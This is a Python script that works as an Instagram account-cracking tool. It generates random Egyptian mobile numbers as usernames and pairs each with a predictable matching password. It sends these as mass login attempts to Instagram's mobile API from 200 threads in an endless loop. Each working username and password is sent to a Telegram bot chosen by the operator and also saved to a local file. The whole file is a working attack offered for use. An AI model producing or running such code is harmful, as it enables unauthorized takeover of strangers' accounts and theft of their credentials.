import os
try:
    import uuid
except:
    os.system('pip install uuid')

try:
    from random import *
except:
    os.systeam('pip install random ')

try:
    import string
except:
    os.system('pip install string')

try:
    import requests
except:
    os.system('pip install requests ')

try:
    from user_agent import generate_user_agent
except:
    os.system('pip install user_agent ')

try:
    from datetime import datetime
except:
    os.system('pip install datetime ')

try:
    import time,threading
except:
    os.system('pip install time')
else:
    os.system('clear')
    try:
        import pyfiglet
    except:
        os.system('pip install pyfiglet')
    else:
        os.system('clear')
        import pyfiglet, os
        from time import sleep
        import webbrowser
        Z = '\x1b[2;31m'
        G = '\x1b[1;32m'
        A = '\033[2;39m'
        C = '\033[2;35m' 
        B = '\033[2;36m'
        C = '\033[2;35m'         
         
        os.system('clear')
        import random, uuid, requests, string
        from user_agent import generate_user_agent
        from datetime import datetime
        from random import *
        from time import sleep
        import requests, os, random, json, threading, secrets, uuid
        from colorama import Fore, Style
        from time import sleep
        from datetime import datetime
        from secrets import token_hex
        from uuid import uuid4
        from user_agent import generate_user_agent
        from uuid import uuid4
        aa = 0
        zz = 0
        Z = '\033[1;31m' #
        X = '\033[1;33m' #
        Z1 = '\033[2;31m'  
        F = '\033[2;32m' #
        A = '\033[2;39m' #
        C = '\033[2;35m' 
        B = '\033[2;36m'
        Y = '\033[1;34m' 
        E = '\x1b[1;31m'
        G = '\x1b[1;32m'
        S = '\x1b[1;33m'
        A = '\033[2;39m'
        C = '\033[2;35m' 
        Y = '\033[1;34m'       
        
        print(E+ '='*40)
        print(X+  """         -       
\nA - 1    EG 010
\nA - 2    EG 011
\nA - 3    EG 012
\nA - 4    EG 015               
                """)      
        ask = input(' \n >> ')
        ID = input('Enter your id >> ')
        token = input('Enter your tokin >> ')
    
           
        r = requests.Session()
        user = '0987654321'
       
        if ask == '1':
            def ruu():
                try:
                    us = str(''.join((random.choice(user) for i in range(8))))
                    username = '+2010' + us
                    password = '010' + us
                    url = 'https://i.instagram.com/api/v1/accounts/login/'
                    headers = {'User-Agent':'Instagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)', 
                    'Accept':'*/*', 
                    'Cookie':'missing', 
                    'Accept-Encoding':'gzip, deflate', 
                    'Accept-Language':'en-US', 
                    'X-IG-Capabilities':'3brTvw==', 
                    'X-IG-Connection-Type':'WIFI', 
                    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 
                    'Host':'i.instagram.com'}
                    uid = str(uuid4())
                    data = {'uuid':uid, 
                    'password':password, 
                    'username':username, 
                    'device_id':uid, 
                    'from_reg':'false', 
                    '_csrftoken':'missing', 
                    'login_attempt_countn':'0'}
                    req_login = r.post(url, headers=headers, data=data, allow_redirects=True)
                    if 'logged_in_user' in req_login.text:
                        print(G + '- username => '+  username + ' | password =>' +  password)
                        tlg = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text=Hi Pro Fishing From Abdullah‌‌\n- - - - - - - - - - - - - - - - - - - - - - - - - -\n[=]Email =>  {username} \n[=]password =>  {password} \n- - - - - - - - - - - - - - - - - - - - - - - - - -\n By :- @Abdullah_Coder "
                        while True:
                            try:
                                i = requests.post(tlg).json()
                                id_msg = i['result']['message_id']
                                break
                            except:
                                continue

                        with open('insta.txt', 'a') as (HACKED):
                            HACKED.write(' [-] UserName : {} \n [-] Passowrd : {} \n\n'.format(username, password))
                    elif '"message":"challenge_required","challenge"' in req_login.text:
                        print(S + '- username S =>' + username + ' |  password => ' + password)
                    else:
                        
                        print(E + '- username =>'+  username + ' | password =>' +  password)
                except:
                    pass
            while True:
                try:
                    Thread = 200
                    threads = []
                    for i in range(Thread):
                        thread1 = threading.Thread(target=ruu)
                        thread1.start()
                        threads.append(thread1)
                    for thread2 in threads:
                        thread2.join()
                except:
                    continue
            
        

if ask == '2':
            def ruu():
                try:
                    us = str(''.join((random.choice(user) for i in range(8))))
                    username = '+2011' + us
                    password = '011' + us
                    url = 'https://i.instagram.com/api/v1/accounts/login/'
                    headers = {'User-Agent':'Instagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)', 
                    'Accept':'*/*', 
                    'Cookie':'missing', 
                    'Accept-Encoding':'gzip, deflate', 
                    'Accept-Language':'en-US', 
                    'X-IG-Capabilities':'3brTvw==', 
                    'X-IG-Connection-Type':'WIFI', 
                    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 
                    'Host':'i.instagram.com'}
                    uid = str(uuid4())
                    data = {'uuid':uid, 
                    'password':password, 
                    'username':username, 
                    'device_id':uid, 
                    'from_reg':'false', 
                    '_csrftoken':'missing', 
                    'login_attempt_countn':'0'}
                    req_login = r.post(url, headers=headers, data=data, allow_redirects=True)
                    if 'logged_in_user' in req_login.text:
                        print(G + '- username => '+  username + ' | password =>' +  password)
                        tlg = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text=Hi Pro Fishing From Abdullah‌‌\n- - - - - - - - - - - - - - - - - - - - - - - - - -\n[=]Email =>  {username} \n[=]password =>  {password} \n- - - - - - - - - - - - - - - - - - - - - - - - - -\n By :- @Abdullah_Coder "
                        while True:
                            try:
                                i = requests.post(tlg).json()
                                id_msg = i['result']['message_id']
                                break
                            except:
                                continue
                        with open('insta.txt', 'a') as (HACKED):
                            HACKED.write(' [-] UserName : {} \n [-] Passowrd : {} \n\n'.format(username, password))
                    elif '"message":"challenge_required","challenge"' in req_login.text:
                        print(S + '- username S =>' + username + ' |  password => ' + password)
                    else:
                        
                        print(E + '- username =>'+  username + ' | password =>' +  password)
                except:
                    pass
            while True:
                try:
                    Thread = 200
                    threads = []
                    for i in range(Thread):
                        thread1 = threading.Thread(target=ruu)
                        thread1.start()
                        threads.append(thread1)
                    for thread2 in threads:
                        thread2.join()
                except:
                    continue

if ask == '3':
            def ruu():
               try:
                us = str(''.join((random.choice(user) for i in range(8))))
                username = '+2012' + us
                password = '012' + us
                url = 'https://i.instagram.com/api/v1/accounts/login/'
                headers = {'User-Agent':'Instagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)', 
                 'Accept':'*/*', 
                 'Cookie':'missing', 
                 'Accept-Encoding':'gzip, deflate', 
                 'Accept-Language':'en-US', 
                 'X-IG-Capabilities':'3brTvw==', 
                 'X-IG-Connection-Type':'WIFI', 
                 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 
                 'Host':'i.instagram.com'}
                uid = str(uuid4())
                data = {'uuid':uid, 
                 'password':password, 
                 'username':username, 
                 'device_id':uid, 
                 'from_reg':'false', 
                 '_csrftoken':'missing', 
                 'login_attempt_countn':'0'}
                req_login = r.post(url, headers=headers, data=data, allow_redirects=True)
                if 'logged_in_user' in req_login.text:
                        print(G + '- username => '+  username + ' | password =>' +  password)
                        tlg = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text=Hi Pro Fishing From Abdullah‌‌\n- - - - - - - - - - - - - - - - - - - - - - - - - -\n[=]Email =>  {username} \n[=]password =>  {password} \n- - - - - - - - - - - - - - - - - - - - - - - - - -\n By :- @Abdullah_Coder "
                        while True:
                            try:
                                i = requests.post(tlg).json()
                                id_msg = i['result']['message_id']
                                break
                            except:
                                continue
                        with open('insta.txt', 'a') as (HACKED):
                            HACKED.write(' [-] UserName : {} \n [-] Passowrd : {} \n\n'.format(username, password))
                elif '"message":"challenge_required","challenge"' in req_login.text:
                        print(S + '- username S =>' + username + ' |  password => ' + password)
                else:
                        
                        print(E + '- username =>'+  username + ' | password =>' +  password)
               except:
                    pass
            while True:
                try:
                    Thread = 200
                    threads = []
                    for i in range(Thread):
                        thread1 = threading.Thread(target=ruu)
                        thread1.start()
                        threads.append(thread1)
                    for thread2 in threads:
                        thread2.join()
                except:
                    continue

if ask == '4':
            def ruu():
               try:
                us = str(''.join((random.choice(user) for i in range(8))))
                username = '+2015' + us
                password = '015' + us
                url = 'https://i.instagram.com/api/v1/accounts/login/'
                headers = {'User-Agent':'Instagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)', 
                 'Accept':'*/*', 
                 'Cookie':'missing', 
                 'Accept-Encoding':'gzip, deflate', 
                 'Accept-Language':'en-US', 
                 'X-IG-Capabilities':'3brTvw==', 
                 'X-IG-Connection-Type':'WIFI', 
                 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 
                 'Host':'i.instagram.com'}
                uid = str(uuid4())
                data = {'uuid':uid, 
                 'password':password, 
                 'username':username, 
                 'device_id':uid, 
                 'from_reg':'false', 
                 '_csrftoken':'missing', 
                 'login_attempt_countn':'0'}
                req_login = r.post(url, headers=headers, data=data, allow_redirects=True)
                if 'logged_in_user' in req_login.text:
                        print(G + '- username => '+  username + ' | password =>' +  password)
                        tlg = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text=Hi Pro Fishing From Abdullah‌‌\n- - - - - - - - - - - - - - - - - - - - - - - - - -\n[=]Email =>  {username} \n[=]password =>  {password} \n- - - - - - - - - - - - - - - - - - - - - - - - - -\n By :- @Abdullah_Coder "
                        while True:
                            try:
                                i = requests.post(tlg).json()
                                id_msg = i['result']['message_id']
                                break
                            except:
                                continue
                        with open('insta.txt', 'a') as (HACKED):
                            HACKED.write(' [-] UserName : {} \n [-] Passowrd : {} \n\n'.format(username, password))
                elif '"message":"challenge_required","challenge"' in req_login.text:
                        print(S + '- username S =>' + username + ' |  password => ' + password)
                else:
                        
                        print(E + '- username =>'+  username + ' | password =>' +  password)
               except:
                    pass
            while True:
                try:
                    Thread = 200
                    threads = []
                    for i in range(Thread):
                        thread1 = threading.Thread(target=ruu)
                        thread1.start()
                        threads.append(thread1)
                    for thread2 in threads:
                        thread2.join()
                except:
                    continue
